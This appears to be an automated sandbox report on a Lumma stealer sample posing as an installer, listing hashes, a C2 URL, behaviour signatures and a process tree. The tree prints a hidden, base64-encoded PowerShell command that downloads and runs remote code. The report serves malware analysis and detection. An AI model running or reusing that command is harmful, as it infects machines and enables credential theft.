3183c6aa694...90.exe
windows7-x64
10183c6aa694...90.exe
windows10-2004-x64
8install.exe
windows7-x64
10install.exe
windows10-2004-x64
8jre/Welcome.html
windows7-x64
3jre/Welcome.html
windows10-2004-x64
3jre/bin/JA...32.dll
windows7-x64
3jre/bin/JA...32.dll
windows10-2004-x64
3jre/bin/JA...ge.dll
windows7-x64
3jre/bin/JA...ge.dll
windows10-2004-x64
3jre/bin/Ja...32.dll
windows7-x64
3jre/bin/Ja...32.dll
windows10-2004-x64
3jre/bin/Ja...ge.dll
windows7-x64
3jre/bin/Ja...ge.dll
windows10-2004-x64
3jre/bin/Wi...32.dll
windows7-x64
3jre/bin/Wi...32.dll
windows10-2004-x64
3jre/bin/Wi...ge.dll
windows7-x64
3jre/bin/Wi...ge.dll
windows10-2004-x64
3jre/bin/awt.dll
windows7-x64
3jre/bin/awt.dll
windows10-2004-x64
3jre/bin/bci.dll
windows7-x64
3jre/bin/bci.dll
windows10-2004-x64
3jre/bin/cl...vm.dll
windows7-x64
3jre/bin/cl...vm.dll
windows10-2004-x64
3jre/bin/dcpr.dll
windows7-x64
3jre/bin/dcpr.dll
windows10-2004-x64
3jre/bin/de...se.dll
windows7-x64
3jre/bin/de...se.dll
windows10-2004-x64
3jre/bin/deploy.dll
windows7-x64
3jre/bin/deploy.dll
windows10-2004-x64
3jre/bin/dt_shmem.dll
windows7-x64
3jre/bin/dt_shmem.dll
windows10-2004-x64
3Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system -
submitted
22-11-2024 02:08
Static task
static1
Behavioral task
behavioral1
Sample
183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
install.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
install.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
jre/Welcome.html
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
jre/Welcome.html
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
jre/bin/JAWTAccessBridge-32.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
jre/bin/JAWTAccessBridge-32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
jre/bin/JAWTAccessBridge.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
jre/bin/JAWTAccessBridge.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
jre/bin/JavaAccessBridge-32.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
jre/bin/JavaAccessBridge-32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
jre/bin/JavaAccessBridge.dll
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
jre/bin/JavaAccessBridge.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
jre/bin/WindowsAccessBridge-32.dll
Resource
win7-20241023-en
Behavioral task
behavioral16
Sample
jre/bin/WindowsAccessBridge-32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
jre/bin/WindowsAccessBridge.dll
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
jre/bin/WindowsAccessBridge.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
jre/bin/awt.dll
Resource
win7-20241010-en
Behavioral task
behavioral20
Sample
jre/bin/awt.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
jre/bin/bci.dll
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
jre/bin/bci.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
jre/bin/client/jvm.dll
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
jre/bin/client/jvm.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
jre/bin/dcpr.dll
Resource
win7-20241010-en
Behavioral task
behavioral26
Sample
jre/bin/dcpr.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
jre/bin/decora_sse.dll
Resource
win7-20240708-en
Behavioral task
behavioral28
Sample
jre/bin/decora_sse.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
jre/bin/deploy.dll
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
jre/bin/deploy.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
jre/bin/dt_shmem.dll
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
jre/bin/dt_shmem.dll
Resource
win10v2004-20241007-en
General
-
Target
install.exe
-
Size
136KB
-
MD5
fca89c62d6ea9f979b3a8d21ee2c4f55
-
SHA1
bd77809998b5cfef93e3c34af3ddb8292f549d44
-
SHA256
6b069e5b450898615e709275bc0a53b529f171301a603093bdc17ebd784e0e34
-
SHA512
f1f1f30d0c07c343d9709dd4a6405751de678886703bd59f2d72751f3d470ca88389b3ce3ba5966282e6f60ae68f13de722e885f4bd1bfae2aad60323edf7df0
-
SSDEEP
1536:xZ2FWSNhd/4131iO08SKKAP7wBwp8wZtE:T2ddQ131i1pKJP7w2p
Malware Config
Extracted
lumma
https://quotedjizwe.cyou/api
Signatures
-
Lumma family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell and hides the display window.
pid Process 2756 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 1588 EASteamProxy.exe 792 EASteamProxy.exe -
Loads dropped DLL 20 IoCs
pid Process 2224 cmd.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 pastebin.com 3 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 792 set thread context of 2524 792 EASteamProxy.exe 66 -
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language javaw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2756 powershell.exe 1588 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 2524 cmd.exe 2524 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 792 EASteamProxy.exe 2524 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1864 WMIC.exe Token: SeSecurityPrivilege 1864 WMIC.exe Token: SeTakeOwnershipPrivilege 1864 WMIC.exe Token: SeLoadDriverPrivilege 1864 WMIC.exe Token: SeSystemProfilePrivilege 1864 WMIC.exe Token: SeSystemtimePrivilege 1864 WMIC.exe Token: SeProfSingleProcessPrivilege 1864 WMIC.exe Token: SeIncBasePriorityPrivilege 1864 WMIC.exe Token: SeCreatePagefilePrivilege 1864 WMIC.exe Token: SeBackupPrivilege 1864 WMIC.exe Token: SeRestorePrivilege 1864 WMIC.exe Token: SeShutdownPrivilege 1864 WMIC.exe Token: SeDebugPrivilege 1864 WMIC.exe Token: SeSystemEnvironmentPrivilege 1864 WMIC.exe Token: SeRemoteShutdownPrivilege 1864 WMIC.exe Token: SeUndockPrivilege 1864 WMIC.exe Token: SeManageVolumePrivilege 1864 WMIC.exe Token: 33 1864 WMIC.exe Token: 34 1864 WMIC.exe Token: 35 1864 WMIC.exe Token: SeIncreaseQuotaPrivilege 1864 WMIC.exe Token: SeSecurityPrivilege 1864 WMIC.exe Token: SeTakeOwnershipPrivilege 1864 WMIC.exe Token: SeLoadDriverPrivilege 1864 WMIC.exe Token: SeSystemProfilePrivilege 1864 WMIC.exe Token: SeSystemtimePrivilege 1864 WMIC.exe Token: SeProfSingleProcessPrivilege 1864 WMIC.exe Token: SeIncBasePriorityPrivilege 1864 WMIC.exe Token: SeCreatePagefilePrivilege 1864 WMIC.exe Token: SeBackupPrivilege 1864 WMIC.exe Token: SeRestorePrivilege 1864 WMIC.exe Token: SeShutdownPrivilege 1864 WMIC.exe Token: SeDebugPrivilege 1864 WMIC.exe Token: SeSystemEnvironmentPrivilege 1864 WMIC.exe Token: SeRemoteShutdownPrivilege 1864 WMIC.exe Token: SeUndockPrivilege 1864 WMIC.exe Token: SeManageVolumePrivilege 1864 WMIC.exe Token: 33 1864 WMIC.exe Token: 34 1864 WMIC.exe Token: 35 1864 WMIC.exe Token: SeIncreaseQuotaPrivilege 1160 WMIC.exe Token: SeSecurityPrivilege 1160 WMIC.exe Token: SeTakeOwnershipPrivilege 1160 WMIC.exe Token: SeLoadDriverPrivilege 1160 WMIC.exe Token: SeSystemProfilePrivilege 1160 WMIC.exe Token: SeSystemtimePrivilege 1160 WMIC.exe Token: SeProfSingleProcessPrivilege 1160 WMIC.exe Token: 
SeIncBasePriorityPrivilege 1160 WMIC.exe Token: SeCreatePagefilePrivilege 1160 WMIC.exe Token: SeBackupPrivilege 1160 WMIC.exe Token: SeRestorePrivilege 1160 WMIC.exe Token: SeShutdownPrivilege 1160 WMIC.exe Token: SeDebugPrivilege 1160 WMIC.exe Token: SeSystemEnvironmentPrivilege 1160 WMIC.exe Token: SeRemoteShutdownPrivilege 1160 WMIC.exe Token: SeUndockPrivilege 1160 WMIC.exe Token: SeManageVolumePrivilege 1160 WMIC.exe Token: 33 1160 WMIC.exe Token: 34 1160 WMIC.exe Token: 35 1160 WMIC.exe Token: SeIncreaseQuotaPrivilege 1160 WMIC.exe Token: SeSecurityPrivilege 1160 WMIC.exe Token: SeTakeOwnershipPrivilege 1160 WMIC.exe Token: SeLoadDriverPrivilege 1160 WMIC.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2716 javaw.exe 2716 javaw.exe 992 AcroRd32.exe 992 AcroRd32.exe 992 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 3008 1676 cmd.exe 35 PID 1676 wrote to memory of 3008 1676 cmd.exe 35 PID 1676 wrote to memory of 3008 1676 cmd.exe 35 PID 1676 wrote to memory of 3008 1676 cmd.exe 35 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 2540 3004 
cmd.exe 38 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2512 wrote to memory of 1144 2512 cmd.exe 44 PID 2512 wrote to memory of 1144 2512 cmd.exe 44 PID 2512 wrote to memory of 1144 2512 cmd.exe 44 PID 2512 wrote to memory of 1144 2512 cmd.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 650014⤵
- System Location Discovery: System Language Discovery
PID:2372
-
-
C:\Windows\system32\reg.exeC:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"4⤵PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8664⤵
- System Location Discovery: System Language Discovery
PID:2540
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com4⤵
- System Location Discovery: System Language Discovery
PID:772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8664⤵
- System Location Discovery: System Language Discovery
PID:1144
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com4⤵
- System Location Discovery: System Language Discovery
PID:2364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"3⤵
- System Location Discovery: System Language Discovery
PID:836 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8664⤵
- System Location Discovery: System Language Discovery
PID:1616
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List4⤵
- System Location Discovery: System Language Discovery
PID:1636
-
-
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com4⤵
- System Location Discovery: System Language Discovery
PID:2520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""3⤵
- System Location Discovery: System Language Discovery
PID:956 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 650014⤵
- System Location Discovery: System Language Discovery
PID:272
-
-
C:\Windows\system32\reg.exeC:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"4⤵PID:968
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQokcj0naHR0cDovL2NhdHNpLm5ldC9pbmNhbGwucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7IFtuZXQuU2VydmljRXBPaU50bUFuYWdlUl06OnNFQ3VyaVRZcFJPVG9jT2wgPSBbbkVULnNlQ1VSSVR5cFJPVG9jb0xUWXBlXTo6VGxzMTI7ICR0dHAgPSBpd3IgJHIgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkdHRwLkNvbnRlbnQ7')); Invoke-Expression $script}"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2756
-
-
C:\Windows\SysWOW64\cmd.execmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/a669a9b5df507d7574a94fbd2fc87144/" && (for %F in (*.exe) do start "" "%F")"3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2224 -
C:\Users\Admin\AppData\Local\Temp\a669a9b5df507d7574a94fbd2fc87144\EASteamProxy.exe"EASteamProxy.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1588 -
C:\Users\Admin\AppData\Roaming\Serverdownload\EASteamProxy.exeC:\Users\Admin\AppData\Roaming\Serverdownload\EASteamProxy.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2524 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- System Location Discovery: System Language Discovery
PID:1816
-
-
-
-
-
-
C:\Windows\SysWOW64\explorer.exeexplorer C:\Users\Admin\AppData\Local\Temp\eedc4ecf5411a44543d78936d137ddf3.pdf3⤵
- System Location Discovery: System Language Discovery
PID:1800
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:2616
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\eedc4ecf5411a44543d78936d137ddf3.pdf"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:992
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
1.0MB
MD5 7c986d80f20a9fcf5bc4c830137b26ce
SHA1 bcdd68c5ef1d03874468f5ba779f486318e13dcf
SHA256 c37b2d07d08c297153d6e34fd514090883b766536bda4341b3d3af677c8da16c
SHA512 2a6b5716ae93b544fbeab675fa9247603c887cac6b32ec332fed24d6e2e825da7c0da33e850941e4e730366dfd6bb1dc57c809dfaf3b562b19b1ecfd956f09a2
-
Filesize
5.4MB
MD5 ad2735f096925010a53450cb4178c89e
SHA1 c6d65163c6315a642664f4eaec0fae9528549bfe
SHA256 4e775b5fafb4e6d89a4694f8694d2b8b540534bd4a52ff42f70095f1c929160e
SHA512 1868b22a7c5cba89545b06f010c09c5418b3d86039099d681eee9567c47208fdba3b89c6251cf03c964c58c805280d45ba9c3533125f6bd3e0bc067477e03ab9
-
Filesize
564KB
MD5 1ba6d1cf0508775096f9e121a24e5863
SHA1 df552810d779476610da3c8b956cc921ed6c91ae
SHA256 74892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823
SHA512 9887d9f5838aa1555ea87968e014edfe2f7747f138f1b551d1f609bc1d5d8214a5fdab0d76fcac98864c1da5eb81405ca373b2a30cb12203c011d89ea6d069af
-
Filesize
6.0MB
MD5 2a7f32421b71aaeebd6287f55acdf983
SHA1 217db3af7575622d58f94845b7ee6ceffd6e1c0f
SHA256 d0e476c7573735b01ba7893b7e513ac463316b50b5d6e238878a8567b0b1bc86
SHA512 b5839c867d3ea09f0796482f8040ed5ebb9ddf9917df8ce76ed675e377af97ab0ac06917af0c2d8401afa30c5deb7052e7218c779dd731c7774ca10dc1306bf5
-
Filesize
1.3MB
MD5 c24c89879410889df656e3a961c59bcc
SHA1 25a9e4e545e86b0a5fe14ee0147746667892fabd
SHA256 739bedcfc8eb860927eb2057474be5b39518aaaa6703f9f85307a432fa1f236e
SHA512 0542c431049e4fd40619579062d206396bef2f6dadadbf9294619c918b9e6c96634dcd404b78c6045974295126ec35dd842c6ec8f42279d9598b57a751cd0034
-
Filesize
106KB
MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d
-
Filesize
48KB
MD5 cf0a1c4776ffe23ada5e570fc36e39fe
SHA1 2050fadecc11550ad9bde0b542bcf87e19d37f1a
SHA256 6fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47
SHA512 d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168
-
Filesize
19KB
MD5 5df7aef6e2e2691eb57558a45eba260e
SHA1 a9e9053a5a2810f89ff349c5e6bfc98a5271750f
SHA256 93aa2b9642df06986e0cf718a3708d22a30ced07e93c1d16f999f456de982a17
SHA512 1432dc775add2f5ec4c30964fcd58f5e2dde836ebdc10cf9f2404a0e2915d98c89cfc310d2ec16b51c2a3791352c4096d33715628d58db5064d65c35578c0789
-
Filesize
799KB
MD5 e2658cb392d04822f8d80aad17f8f9ce
SHA1 a5a93b010269939482714985b5bcea25e806088d
SHA256 aec797462aad55a6b688ceb5e1c83c874c3828d4dfc8f2460e5c01342f7728e4
SHA512 31c95479e522d589a0f659a0af0e771ba5634c1515fcffb161b09c97ae60834266846a640bf3a18969a618d1bcb9eff5161bb54108d47b4379fdbaba2a8b67b6
-
Filesize
2.7MB
MD5 28dea3e780552eb5c53b3b9b1f556628
SHA1 55dccd5b30ce0363e8ebdfeb1cca38d1289748b8
SHA256 52415829d85c06df8724a3d3d00c98f12beabf5d6f3cbad919ec8000841a86e8
SHA512 19dfe5f71901e43ea34d257f693ae1a36433dbdbcd7c9440d9b0f9eea24de65c4a8fe332f7b88144e1a719a6ba791c2048b4dd3e5b1ed0fdd4c813603ad35112
-
Filesize
669KB
MD5 4ad03043a32e9a1ef64115fc1ace5787
SHA1 352e0e3a628c8626cff7eed348221e889f6a25c4
SHA256 a0e43cbc4a2d8d39f225abd91980001b7b2b5001e8b2b8292537ae39b17b85d1
SHA512 edfae3660a5f19a9deda0375efba7261d211a74f1d8b6bf1a8440fed4619c4b747aca8301d221fd91230e7af1dab73123707cc6eda90e53eb8b6b80872689ba6
-
Filesize
291KB
MD5 6b4ab6e60364c55f18a56a39021b74a6
SHA1 39cac2889d8ca497ee0d8434fc9f6966f18fa336
SHA256 1db3fd414039d3e5815a5721925dd2e0a3a9f2549603c6cab7c49b84966a1af3
SHA512 c08de8c6e331d13dfe868ab340e41552fc49123a9f782a5a63b95795d5d979e68b5a6ab171153978679c0791dc3e3809c883471a05864041ce60b240ccdd4c21
-
Filesize
51KB
MD5 acfffe6de49ab6bbcb590e95d558111b
SHA1 51d7b4a4ef2851f4787805bd2eebc61f9f62ae34
SHA256 fd0bc347f27e479b565d6095bfdc96ef2f42a7ae8649c40e1e702c8f16ab6217
SHA512 94fd4a2de31420576169b79c9617fb1eed4778fb50c17a9c8587b123169022e9338fe8d4b89bb5de5b06367eed6737e739423416c8be3f7f5f24b75b3b3ee28e
-
Filesize
3KB
MD5 4f33b5a78d952db07585df93c5ad5d20
SHA1 367e6e8bb93a72524ee9bd1c05e089c4ba557b42
SHA256 63e52c85b6116aaba909ee38a010586c38e0bbfbfd6c19c379885302d6b82f24
